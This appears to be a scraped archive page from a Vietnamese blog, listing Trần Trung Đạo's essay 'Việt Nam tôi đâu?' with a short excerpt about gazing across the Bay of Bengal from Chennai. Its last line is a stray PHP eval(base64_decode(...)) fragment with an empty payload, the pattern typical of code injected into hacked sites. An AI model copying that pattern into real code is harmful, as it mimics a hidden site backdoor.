Archive for February 27th, 2012

Trần Trung Đạo: “Việt Nam tôi đâu?” câu hỏi của nhiều thế hệ

Trần Trung Đạo: “Việt Nam tôi đâu?” câu hỏi của nhiều thế hệ

Buổi trưa ở Chennai. Làm việc xong trên đường trở về khách sạn, tôi nhờ người lái xe đưa đi thăm vịnh Bengal. Đứng bên bờ vịnh nhìn sang phía bên kia bờ là Đông Nam Á. Tôi tự hỏi Việt Nam đang nằm ở đâu sau dòng nước xanh xa thẳm

02.27.2012 | Tiểu Luận- Chính Luận |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>